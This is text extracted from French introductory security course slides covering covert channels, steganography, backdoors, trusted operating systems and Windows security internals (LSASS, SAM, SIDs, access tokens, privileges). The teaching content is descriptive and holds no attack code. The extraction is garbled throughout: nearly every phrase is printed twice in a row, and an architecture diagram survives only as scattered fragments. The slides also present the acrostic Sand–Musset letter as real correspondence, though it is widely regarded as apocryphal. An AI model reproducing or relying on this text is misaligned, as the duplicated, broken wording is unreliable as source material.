Page 117: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Canaux cachésCanaux cachésMoyen pour une entité de recevoir des infos de Moyen pour une entité de recevoir des infos de manière non autoriséemanière non autoriséeExemplesExemples Loki2 : qui envoie du contenu dans le champ données Loki2 : qui envoie du contenu dans le champ données

des paquets ICMP (qui est censé être non utilisé)des paquets ICMP (qui est censé être non utilisé) Processus qui aurait un comportement temporel Processus qui aurait un comportement temporel

révélant des informations à un autre processus (sorte révélant des informations à un autre processus (sorte de langage Morse)de langage Morse)

Options IP ou TCPOptions IP ou TCPVariations du champ TTLVariations du champ TTLVariations du champ n° de séquence TCPVariations du champ n° de séquence TCP

Outil Outil stegtunnelstegtunnel

Page 118: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Correspondance de George Sand avec Alfred de MussetCorrespondance de George Sand avec Alfred de Musset

Je suis très émue de vous dire que j'aiJe suis très émue de vous dire que j'aibien compris, l'autre jour, que vous avezbien compris, l'autre jour, que vous aveztoujours une envie folle de me fairetoujours une envie folle de me fairedanser. Je garde un souvenir de votredanser. Je garde un souvenir de votrebaiser et je voudrais que ce soitbaiser et je voudrais que ce soitlà une preuve que je puisse être aiméelà une preuve que je puisse être aiméepar vous. Je suis prête à vous montrer monpar vous. Je suis prête à vous montrer monAffection toute désintéressée et sans cal-Affection toute désintéressée et sans cal-cul. Si vous voulez me voir ainsicul. Si vous voulez me voir ainsidévoiler, sans aucun artifice mon âmedévoiler, sans aucun artifice mon âmetoute nue, daignez donc me faire une visitetoute nue, daignez donc me faire une visiteEt nous causerons en amis et en chemin.Et nous causerons en amis et en chemin.Je vous prouverai que je suis la femmeJe vous prouverai que je suis la femmesincère capable de vous offrir l'affectionsincère capable de vous offrir l'affectionla plus profonde et la plus étroitela plus profonde et la plus étroiteAmitié, en un mot, la meilleure amieAmitié, en un mot, la meilleure amieque vous puissiez rêver. Puisque votreque vous puissiez rêver. Puisque votreâme est libre, alors que l'abandon où jeâme est libre, alors que l'abandon où jevis est bien long, bien dur et bien souventvis est bien long, bien dur et bien souventpénible, ami très cher, j'ai le coeurpénible, ami très cher, j'ai le coeurgros, accourez vite et venez me legros, accourez vite et venez me lefait oublier. À l'amour, je veux me sou-fait oublier. À l'amour, je veux me sou-mettre. mettre. Quand je vous jure, hélas, un éternel hommageQuand je vous jure, hélas, un éternel hommageVoulez-vous qu'un instant je change de langageVoulez-vous qu'un instant je change de langageQue ne puis-je, avec vous, goûter le vrai bonheurQue ne puis-je, avec vous, goûter le vrai bonheurJe vous aime, ô ma belle, et ma plume en délireJe vous aime, ô ma belle, et ma plume en délireCouche sur le papier ce que je n'ose direCouche sur le papier ce que je n'ose direAvec soin, de mes vers, lisez le premier motAvec soin, de mes vers, lisez le premier motVous saurez quel remède apporter à mes maux.Vous saurez quel remède apporter à mes maux.Cette grande faveur que votre ardeur réclameCette grande faveur que votre ardeur réclameNuit peut-être à l'honneur mais répond à ma flamme.Nuit peut-être à l'honneur mais répond à ma flamme.

Page 119: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

StéganographieStéganographieL’art de dissimuler L’art de dissimuler des données dans des données dans d’autres donnéesd’autres donnéesPar exemple ci-Par exemple ci-contre, la photo du contre, la photo du bas est contenue bas est contenue dans celle du hautdans celle du haut http://www.petitcolas.nhttp://www.petitcolas.n

et/fabien/steganograpet/fabien/steganography/image%5Fdowngrahy/image%5Fdowngrading/ding/

Page 120: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

BackdoorsBackdoorsPortes dérobées destinées à fournir un Portes dérobées destinées à fournir un accès facile au système ou à une accès facile au système ou à une applicationapplication Souvent introduites par les développeurs pour Souvent introduites par les développeurs pour

des questions de facilité de maintenance lors des questions de facilité de maintenance lors du développementdu développement

Formes variées de code spécifique, voire de Formes variées de code spécifique, voire de compte par défaut non documentécompte par défaut non documenté

Parfois « oubliées » intentionnellement ou pas Parfois « oubliées » intentionnellement ou pas dans certains produitsdans certains produits

Le rêve pour l’attaquant, le cauchemar pour le Le rêve pour l’attaquant, le cauchemar pour le responsable sécuritéresponsable sécurité

Page 121: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Quelques exemples Quelques exemples Trusted SolarisTrusted Solaris Station et serveurStation et serveur Mandatory Access ControlMandatory Access Control

Multiniveau (pas de partage d’information entre différents Multiniveau (pas de partage d’information entre différents compartiments avec des labels différents)compartiments avec des labels différents)Sensivity LabelsSensivity Labels sur les fichiers, répertoires, fenêtres, sur les fichiers, répertoires, fenêtres, périphériques, réseaux, …périphériques, réseaux, …Clearance Clearance sur les utilisateurs = fourchette de sur les utilisateurs = fourchette de sensivity labelssensivity labels

Utilisation de rôles (pas de Utilisation de rôles (pas de super usersuper user)) Profils d’exécution (pour contourner les restrictions de Profils d’exécution (pour contourner les restrictions de

sécurité pour certaines commandes)sécurité pour certaines commandes) Chemin de confiance du clavier aux fenêtresChemin de confiance du clavier aux fenêtres Add-on de la version 10 (auparavant : produit séparé)Add-on de la version 10 (auparavant : produit séparé)

Page 122: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Quelques exemplesQuelques exemplesSecurity Enhanced LinuxSecurity Enhanced Linux Prototype de noyau Linux et de quelques utilitaires Prototype de noyau Linux et de quelques utilitaires

issus de la recherche faite par la NSAissus de la recherche faite par la NSA Mandatory Access ControlMandatory Access Control Role Based Access Control, Type EnforcementRole Based Access Control, Type Enforcement, ,

MultiniveauMultiniveau Pas de compte Pas de compte rootroot Pas de fonctions d’audit, pas d’évaluation de type Pas de fonctions d’audit, pas d’évaluation de type

Critères Communs (donc ce n’est pas à proprement Critères Communs (donc ce n’est pas à proprement parler un Trusted OS comme Trusted Solaris)parler un Trusted OS comme Trusted Solaris)

Définition d’une politique de sécuritéDéfinition d’une politique de sécurité

Page 123: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Quelques exemplesQuelques exemplesWindowsWindows D’après D’après Windows InternalsWindows Internals

Mark Russinovitch, David SolomonMark Russinovitch, David Solomonhttp://http://www.sysinternals.com/windowsinternals.shtmlwww.sysinternals.com/windowsinternals.shtml

Page 124: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

WindowsWindows

System service dispatcher(Kernel-mode callable interfaces)

File systemcache

Object M

anager

PnP Manager

Power M

anager

Security ReferenceM

onitor

Virtual Mem

ory

Process &Thread

Configuration mgr

(Registry)

Local ProcedureCall

Device & FileSystemDriver

I/O Manager

KernelHardware Abstraction Layer (HAL)

Win32USER,GDI

GraphicsDrivers

Systemthreads

MSGINAWinlogon

Msv1_0.dllKerberos.dll

Netlogon

LSA Server

SAMServer

ActiveDirectory

LSASS EventLogger

User ModeKernel Mode

LSAPolicy SAM

ActiveDirectory

Page 125: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants sécurité Windows 2K/3Composants sécurité Windows 2K/3Security Reference MonitorSecurity Reference Monitor (SRM) (SRM)

Une des composantes de l’exécutif de Windows 2000/3 Une des composantes de l’exécutif de Windows 2000/3 (NTOSKRNL.EXE)(NTOSKRNL.EXE)

Responsable d’effectuer les contrôles d’accès sur les objets, de Responsable d’effectuer les contrôles d’accès sur les objets, de manipuler les privilèges et droits utilisateur, et de générer les manipuler les privilèges et droits utilisateur, et de générer les messages d’audit de sécurité résultantsmessages d’audit de sécurité résultants

Local Security Authority SubsystemLocal Security Authority Subsystem (LSASS) (LSASS) Un processus en mode utilisateur qui exécute l’image Un processus en mode utilisateur qui exécute l’image

LSASS.EXE LSASS.EXE Responsable Responsable

De la politique de sécurité locale (utilisateurs autorisés à se De la politique de sécurité locale (utilisateurs autorisés à se connecter sur la machine, politique de mots de passe, privilèges connecter sur la machine, politique de mots de passe, privilèges donnés aux utilisateurs et aux groupes)donnés aux utilisateurs et aux groupes)De l’authentification des utilisateurs et de l’envoi des messages De l’authentification des utilisateurs et de l’envoi des messages d’audit de sécurité au journal d’événementd’audit de sécurité au journal d’événement

Le service Le service Local Security Authority ServiceLocal Security Authority Service (LSASRV.DLL) - une (LSASRV.DLL) - une librairie qui est chargée par LSASS - implémente la plus grande librairie qui est chargée par LSASS - implémente la plus grande partie de ces fonctionnalitéspartie de ces fonctionnalités

Page 126: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéLa base de données des politiques de LSASSLa base de données des politiques de LSASS Contient les paramètres de la politique de sécurité Contient les paramètres de la politique de sécurité

localelocale Stockée dans la base de registre en HKLM\Stockée dans la base de registre en HKLM\

SECURITYSECURITY Contient des informations telles queContient des informations telles que

Les domaines qui sont approuvés pour authentifier les Les domaines qui sont approuvés pour authentifier les tentatives de logontentatives de logonQui a la permission d’accéder le système et comment Qui a la permission d’accéder le système et comment ((interactiveinteractive, , networknetwork, , service logonsservice logons))Qui a quel privilègeQui a quel privilègeLe type d’audit de sécurité qui est effectuéLe type d’audit de sécurité qui est effectué

Contient aussi les « secrets » qui concernent les Contient aussi les « secrets » qui concernent les informations de logon qui seront utilisées pour les informations de logon qui seront utilisées pour les domain cached logonsdomain cached logons et les logons des comptes de et les logons des comptes de serviceservice

Page 127: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéLe service Le service Security Accounts ManagerSecurity Accounts Manager (SAM) (SAM) Ensemble de routines responsables de gérer la base Ensemble de routines responsables de gérer la base

de données qui contient les noms d’utilisateurs et les de données qui contient les noms d’utilisateurs et les groupes qui sont définis sur la machine localegroupes qui sont définis sur la machine locale

Implémenté par la DLL SAMSRV.DLL qui s’exécute Implémenté par la DLL SAMSRV.DLL qui s’exécute dans le cadre du processus LSASSdans le cadre du processus LSASS

La base La base SAMSAM qui contient les utilisateurs et les qui contient les utilisateurs et les groupes définis localement avec leurs mots de groupes définis localement avec leurs mots de passe et quelques autres attributspasse et quelques autres attributs Stocké dans HKLM\SAMStocké dans HKLM\SAM

Page 128: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéActive DirectoryActive Directory Un service d’annuaire qui contient une base de Un service d’annuaire qui contient une base de

données qui stocke les informations au sujet des données qui stocke les informations au sujet des objets dans un domaineobjets dans un domaine

Un domaine est une collection de machines avec leurs Un domaine est une collection de machines avec leurs groupes de sécurité associés qui sont gérés comme une groupes de sécurité associés qui sont gérés comme une seule entitéseule entitéL’Active Directory stocke les informations à propos des L’Active Directory stocke les informations à propos des objets dans le domaine, y compris la liste des utilisateurs, objets dans le domaine, y compris la liste des utilisateurs, des groupes et des machinesdes groupes et des machinesLes mots de passe et les privilèges pour les utilisateurs et les Les mots de passe et les privilèges pour les utilisateurs et les groupes du domaine sont stockés dans l’Active Directory groupes du domaine sont stockés dans l’Active Directory dont le contenu est répliqué sur les machines connues sous dont le contenu est répliqué sur les machines connues sous le nom de contrôleurs de domaine (DC, le nom de contrôleurs de domaine (DC, Domain ControllerDomain Controller))

Le serveur Active Directory est implémenté par la DLL Le serveur Active Directory est implémenté par la DLL NTDSA.DLL et s’exécute dans le cadre du processus NTDSA.DLL et s’exécute dans le cadre du processus LSASSLSASS

Page 129: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéLes Les packages d’authentificationpackages d’authentification Les DLL qui s’exécutent dans le cadre du Les DLL qui s’exécutent dans le cadre du

processus LSASS et qui implémentent la processus LSASS et qui implémentent la politique d’authentification de Windows politique d’authentification de Windows 2000/32000/3

Une DLL d’authentification a la responsabilité de Une DLL d’authentification a la responsabilité de s’assurer qu’un nom d’utilisateur et son mot de s’assurer qu’un nom d’utilisateur et son mot de passe sont bien en correspondance et, si c’est le passe sont bien en correspondance et, si c’est le cas, de retourner à LSASS les informations cas, de retourner à LSASS les informations détaillant l’identité de l’utilisateur sur le plan de la détaillant l’identité de l’utilisateur sur le plan de la sécuritésécurité

Page 130: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéLe processus de Le processus de logonlogon ( (WINLOGONWINLOGON))

Un processus en mode user qui exécute WINLOGON.EXEUn processus en mode user qui exécute WINLOGON.EXE Répond au SAS (Répond au SAS (Secure Attention SequenceSecure Attention Sequence))

WINLOGON dispose d’un WINLOGON dispose d’un hookhook spécial qui surveille et reconnaît la spécial qui surveille et reconnaît la séquence Ctrl+Alt+Suppr séquence Ctrl+Alt+Suppr

Gère les sessions de logon interactifGère les sessions de logon interactif Crée un processus Crée un processus shellshell utilisateur (interface homme-machine) utilisateur (interface homme-machine)

quand l’utilisateur se connecte (voir plus loin)quand l’utilisateur se connecte (voir plus loin)GINAGINA ( (Graphical Identification aNd AuthenticationGraphical Identification aNd Authentication))

Une DLL en mode user qui s’exécute dans le cadre du Une DLL en mode user qui s’exécute dans le cadre du processus WINLOGON et qui est utilisé par WINLOGON pour processus WINLOGON et qui est utilisé par WINLOGON pour obtenir le couple (nom d’utilisateur – mot de passe) ou une obtenir le couple (nom d’utilisateur – mot de passe) ou une authentification à l’aide d’une carte à puceauthentification à l’aide d’une carte à puce

La DLL GINA standard est MSGINA.DLLLa DLL GINA standard est MSGINA.DLL

Page 131: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéLe service Le service NETLOGONNETLOGON

Service WIN32 (NETLOGON.DLL) qui s’exécute dans le cadre Service WIN32 (NETLOGON.DLL) qui s’exécute dans le cadre de LSASS et qui répond aux requêtes de logon interactif (si le de LSASS et qui répond aux requêtes de logon interactif (si le contrôleur de domaine exécute NT 4) ou aux validations contrôleur de domaine exécute NT 4) ou aux validations d’authentification LAN Manager et NTLM v1 et v2d’authentification LAN Manager et NTLM v1 et v2

L’authentification est gérée comme le sont les logons locaux en L’authentification est gérée comme le sont les logons locaux en envoyant la demande à LSASS pour vérificationenvoyant la demande à LSASS pour vérification

NETLOGON dispose également d’un service de localisation NETLOGON dispose également d’un service de localisation ((locator servicelocator service) qui permet de localiser les contrôleurs de ) qui permet de localiser les contrôleurs de domainedomaine

Kernel Security Device DriverKernel Security Device Driver (KSecDD)(KSecDD) Une bibliothèque de fonctions en mode noyau qui implémente Une bibliothèque de fonctions en mode noyau qui implémente

les interfaces LPC (les interfaces LPC (Local Procedure CallLocal Procedure Call) pour les autres ) pour les autres composants sécurité en mode noyau (y compris EFS) et pour composants sécurité en mode noyau (y compris EFS) et pour communiquer avec LSASS en mode utilisateurcommuniquer avec LSASS en mode utilisateur

Implémenté sous la forme du pilote \System32\Drivers\Implémenté sous la forme du pilote \System32\Drivers\Ksecdd.sysKsecdd.sys

Page 132: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les composants de la sécuritéLes composants de la sécuritéQuelques précisions sur la communication entre mode Quelques précisions sur la communication entre mode noyau et mode utilisateurnoyau et mode utilisateur

Le SRM qui tourne en mode noyauLe SRM qui tourne en mode noyau et LSASS qui tourne en et LSASS qui tourne en mode utilisateur communiquent en utilisant le mécanisme de mode utilisateur communiquent en utilisant le mécanisme de LPCLPC

Lors de l’initialisation du système, le SRM crée un port appelé Lors de l’initialisation du système, le SRM crée un port appelé SeRmCommandPort auquel se connecte LSASSSeRmCommandPort auquel se connecte LSASS

Quand le processus LSASS démarre, il crée un autre port Quand le processus LSASS démarre, il crée un autre port appelé SeLsaCommandPort ; le SRM se connecte alors à ce appelé SeLsaCommandPort ; le SRM se connecte alors à ce port, ce qui permet la création de ports de communication privésport, ce qui permet la création de ports de communication privés

Le SRM crée alors une section de mémoire partagée pour les Le SRM crée alors une section de mémoire partagée pour les messages de taille supérieure à 256 octetsmessages de taille supérieure à 256 octets

Une fois que SRM et LSASS sont connectés l’un à l’autre lors de Une fois que SRM et LSASS sont connectés l’un à l’autre lors de l’initialisation du système, ils n’écoutent plus sur leurs ports de l’initialisation du système, ils n’écoutent plus sur leurs ports de connexion respectifsconnexion respectifs

Un processus utilisateur n’a donc plus de moyen de se connecter à Un processus utilisateur n’a donc plus de moyen de se connecter à l’un de ces ports pour des motifs plus ou moins avouables : sa l’un de ces ports pour des motifs plus ou moins avouables : sa requête de connexion n’aboutira jamaisrequête de connexion n’aboutira jamais

Page 133: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

La protection des objetsLa protection des objets

FichiersFichiers PériphériquesPériphériques MailslotsMailslots Pipes Pipes (nommés et (nommés et

anonymes)anonymes) Jobs, Processus, ThreadsJobs, Processus, Threads Sections de mémoire Sections de mémoire

partagéepartagée I/O completion portsI/O completion ports LPC portsLPC ports ÉvénementsÉvénements

MutexesMutexes TimersTimers SémaphoresSémaphores Access tokensAccess tokens Window stationsWindow stations DesktopsDesktops PartagesPartages ServicesServices Clés de la base de registreClés de la base de registre ImprimantesImprimantes

Principe du contrôle d’accès discrétionnaire :Principe du contrôle d’accès discrétionnaire : Protection des objetsProtection des objets Audit des accèsAudit des accès

Objets qui peuvent être protégés sous Windows :Objets qui peuvent être protégés sous Windows :

Page 134: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

La protection des objetsLa protection des objetsPuisque les ressources du système qui sont exportées Puisque les ressources du système qui sont exportées vers le mode utilisateur (et requièrent donc une vers le mode utilisateur (et requièrent donc une validation de sécurité) sont implémentées sous la forme validation de sécurité) sont implémentées sous la forme d’objets en mode noyau, l’d’objets en mode noyau, l’Object ManagerObject Manager de Windows de Windows joue un rôle clé pour faire respecter la sécurité des joue un rôle clé pour faire respecter la sécurité des objetsobjets

Pour contrôler qui peut manipuler un objet, le système de Pour contrôler qui peut manipuler un objet, le système de sécurité doit d’abord être certain de l’identité de chaque sécurité doit d’abord être certain de l’identité de chaque utilisateurutilisateur

C’est la raison pour laquelle Windows requiert un logon authentifié C’est la raison pour laquelle Windows requiert un logon authentifié avant d’accéder à n’importe quelle ressource du systèmeavant d’accéder à n’importe quelle ressource du système

Quand un processus requiert un Quand un processus requiert un handlehandle vers un objet, l’ vers un objet, l’object object managermanager et le système de sécurité utilisent l’identification de et le système de sécurité utilisent l’identification de sécurité de l’appelant pour déterminer si cet appelant a bien le sécurité de l’appelant pour déterminer si cet appelant a bien le droit de se voir affecter ce droit de se voir affecter ce handlehandle grâce auquel il pourra accéder grâce auquel il pourra accéder à l’objet en questionà l’objet en question

Page 135: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les Les Security IdentifiersSecurity Identifiers – – SIDSIDAu lieu d’utiliser des noms (qui peuvent ne pas Au lieu d’utiliser des noms (qui peuvent ne pas être uniques) pour identifier les entités qui être uniques) pour identifier les entités qui effectuent des actions sur un système, Windows effectuent des actions sur un système, Windows utilise des utilise des Security IdentifiersSecurity Identifiers (SID) (SID) Les utilisateurs, les groupes (Les utilisateurs, les groupes (local, domainlocal, domain), les ), les

machines, les domaines, les membres des domaines,machines, les domaines, les membres des domaines,… ont des SID… ont des SID

Un SID est une valeur numérique de longueur Un SID est une valeur numérique de longueur variable qui est constituéevariable qui est constituée

D’un numéro de révision de structure de SIDD’un numéro de révision de structure de SIDD’un D’un identificateur d’autoritéidentificateur d’autorité sur 48 bits sur 48 bitsD’un nombre variable de sous-autorité sur 32 bits, appelées D’un nombre variable de sous-autorité sur 32 bits, appelées également également RIDRID ( (Relative IdentifierRelative Identifier))

Page 136: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les Les Security IdentifiersSecurity Identifiers (suite) (suite)S-1-5-21-1679959503-1445791782-2229217306-1109Niveau de révision4 bitsValeur : 1Autorité, 48 bits0 = null1 = world2 = local3 = creator owner4 = non unique5 = NT

Sous-autorités (=RID)

Exemples :0 = null0 = world0 = creator owner1 = creator group2 = creator owner server3 = creator group server

Exemples de well known SIDs :S-1-0-0: NullS-1-1-0: EveryoneS-1-2-0: LocalS-1-3-0: Creator OwnerS-1-3-1: Creator GroupS-1-5-1: DialupS-1-5-2: NetworkS-1-5-3: BatchS-1-5-4: InteractiveS-1-5-5-X-Y : Logon SessionS-1-5-6: ServiceS-1-5-7: Anonymous LogonS-1-5-9: Enterprise Domain ControlersS-1-5-10: SelfS-1-5-11: Authenticated UsersS-1-5-12: RestrictedS-1-5-13: Terminal Server UserS-1-5-14: Remote Interactive LogonS-1-5-18: System (LocalSystem)S-1-5-19: Local ServiceS-1-5-20: Network Service

RID du compte500 = Administrator501 = Guest1000 = user11001 = user2…

SID du domaine / de la machine

Page 137: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les Les Security IdentifiersSecurity Identifiers (suite) (suite) « Well known SIDs » pour les groupes « built-in »« Well known SIDs » pour les groupes « built-in »

SIDSID NameNameS-1-5-32-544S-1-5-32-544 AdministratorsAdministratorsS-1-5-32-545S-1-5-32-545 UsersUsersS-1-5-32-546S-1-5-32-546 GuestsGuestsS-1-5-32-547S-1-5-32-547 Power UsersPower UsersS-1-5-32-548S-1-5-32-548 Account OperatorsAccount OperatorsS-1-5-32-549S-1-5-32-549 Server OperatorsServer OperatorsS-1-5-32-550S-1-5-32-550 Print OperatorsPrint OperatorsS-1-5-32-551S-1-5-32-551 Backup OperatorsBackup OperatorsS-1-5-32-552S-1-5-32-552 ReplicatorReplicatorS-1-5-32-554S-1-5-32-554 Pre-Windows 2000 Compatible AccessPre-Windows 2000 Compatible AccessS-1-5-32-555S-1-5-32-555 Remote Desktop UsersRemote Desktop UsersS-1-5-32-556S-1-5-32-556 Network Configuration OperatorsNetwork Configuration Operators

Page 138: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les Les Security IdentifiersSecurity Identifiers (suite) (suite)Exemples de RID pour les groupes et utilisateurs standardsExemples de RID pour les groupes et utilisateurs standards

SIDSID NameName

S-1-5-domain-500S-1-5-domain-500 AdministratorAdministrator

S-1-5-domain-501S-1-5-domain-501 GuestGuest

S-1-5-domain-502S-1-5-domain-502 krbtgtkrbtgt

S-1-5-domain-512S-1-5-domain-512 Domain AdminsDomain Admins

S-1-5-domain-513S-1-5-domain-513 Domain UsersDomain Users

S-1-5-domain-514S-1-5-domain-514 Domain GuestsDomain Guests

S-1-5-domain-515S-1-5-domain-515 Domain ComputersDomain Computers

S-1-5-domain-516S-1-5-domain-516 Domain ControllersDomain Controllers

S-1-5-domain-517S-1-5-domain-517 Cert PublishersCert Publishers

S-1-5-root domain-518S-1-5-root domain-518 Schema AdminsSchema Admins

S-1-5-root domain-519S-1-5-root domain-519 Enterprise AdminsEnterprise Admins

S-1-5-domain-520S-1-5-domain-520 Group Policy Creator OwnersGroup Policy Creator Owners

S-1-5-domain-553S-1-5-domain-553 RAS and IAS ServersRAS and IAS Servers

Page 139: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notion de « jetons »Notion de « jetons »Le SRM utilise un objet Le SRM utilise un objet appelé « jeton » pour appelé « jeton » pour identifier le identifier le contexte de contexte de sécuritésécurité d’un processus d’un processus ou d’un ou d’un threadthread

Décrit les privilèges, les Décrit les privilèges, les comptes et les groupes comptes et les groupes associés avec le processus associés avec le processus ou le ou le threadthread

Les jetons ont des tailles Les jetons ont des tailles différentes car les différentes car les comptes utilisateurs ont comptes utilisateurs ont différents ensembles de différents ensembles de privilèges et groupes privilèges et groupes associés mais ils associés mais ils partagent tous la même partagent tous la même informationinformation

Token SourceToken Source

Impersonation typeImpersonation type

Token IDToken ID

Authentication IDAuthentication ID

Modified IDModified ID

Expiration timeExpiration time

Default Primary GroupDefault Primary Group

Default DACLDefault DACL

User Account SIDUser Account SID

Group 1 SIDGroup 1 SID

......

Group n SIDGroup n SID

Restricted SID 1Restricted SID 1

......

Restricted SID nRestricted SID n

Privilege 1Privilege 1

......

Privilege nPrivilege n

Page 140: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notion de « jetons » (suite)Notion de « jetons » (suite)

Exemple de privilège : droit d’arrêter la machineExemple de privilège : droit d’arrêter la machineEnviron deux douzaines de privilègesEnviron deux douzaines de privilègesExemples :Exemples :

Nom du privilègeNom du privilège Utilisation du privilègeUtilisation du privilège

SeBackupSeBackup Contourne les contrôles de sécurité pendant Contourne les contrôles de sécurité pendant les sauvegardesles sauvegardes

SeDebugSeDebug Nécessaire pour déboguer un processusNécessaire pour déboguer un processus

SeShutdownSeShutdown Nécessaire pour arrêter un système localNécessaire pour arrêter un système local

SeTakeOwnershipSeTakeOwnership Nécessaire pour prendre le contrôle d’un objet Nécessaire pour prendre le contrôle d’un objet sans bénéficier d’un accès discrétionnairesans bénéficier d’un accès discrétionnaire

Page 141: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notion de « jetons restreints »Notion de « jetons restreints »Un « jeton restreint » est créé à partir d’un Un « jeton restreint » est créé à partir d’un primary primary ou d’un ou d’un impersonation tokenimpersonation token en utilisant en utilisant la fonction la fonction CreateRestrictedTokenCreateRestrictedTokenLe jeton restreint (Le jeton restreint (restricted tokenrestricted token) est une copie ) est une copie modifiée du jeton d’origine :modifiée du jeton d’origine : Des privilèges peuvent être supprimés du jetonDes privilèges peuvent être supprimés du jeton Des SIDs du jeton peuvent être marqués comme Des SIDs du jeton peuvent être marqués comme

deny-onlydeny-only Des SIDs du jeton peuvent être marqués comme Des SIDs du jeton peuvent être marqués comme

restrictedrestrictedLes jetons restreints sont utiles quand une Les jetons restreints sont utiles quand une application veut réaliser l’application veut réaliser l’impersonationimpersonation d’un d’un client à un niveau de sécurité moindre, pour des client à un niveau de sécurité moindre, pour des raisons de sécurité ou quand on exécute du raisons de sécurité ou quand on exécute du code indigne de confiancecode indigne de confiance

Page 142: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notion de « jetons restreints »Notion de « jetons restreints »DémoDémo

Page 143: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Notion de « jetons restreints »Notion de « jetons restreints »

Effets de bordEffets de bord Tous les privilèges sauf SeChangeNotifyPrivilege Tous les privilèges sauf SeChangeNotifyPrivilege

ont été supprimésont été supprimés Tout SID Administrator (Tout SID Administrator (Power UsersPower Users) est marqué ) est marqué

en en deny-onlydeny-only (contrôle des ACE (contrôle des ACE DenyDeny mais pas des mais pas des ACE ACE AllowAllow))

Tous les SID du jeton sont ajoutés à la liste des Tous les SID du jeton sont ajoutés à la liste des restricted SIDsrestricted SIDs sauf : sauf :

Le SID de l’utilisateurLe SID de l’utilisateurTout SID de groupe Tout SID de groupe AdministratorsAdministrators ou ou Power UsersPower Users

Pas d’accès à Pas d’accès à C:\Documents and Settings\userC:\Documents and Settings\user

Page 144: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Security DescriptorsSecurity DescriptorsPour résumer avant d’aller plus loinPour résumer avant d’aller plus loin

Les objets ont un Les objets ont un Security Security DescriptorDescriptor

objet = fichier, imprimante, sémaphore,...objet = fichier, imprimante, sémaphore,...

Le Le Security DescriptorSecurity Descriptor contient : contient : Les permissions d’accès Les permissions d’accès

((Discretionary ACLDiscretionary ACL)) Les caractéristiques d’Les caractéristiques d’auditingauditing

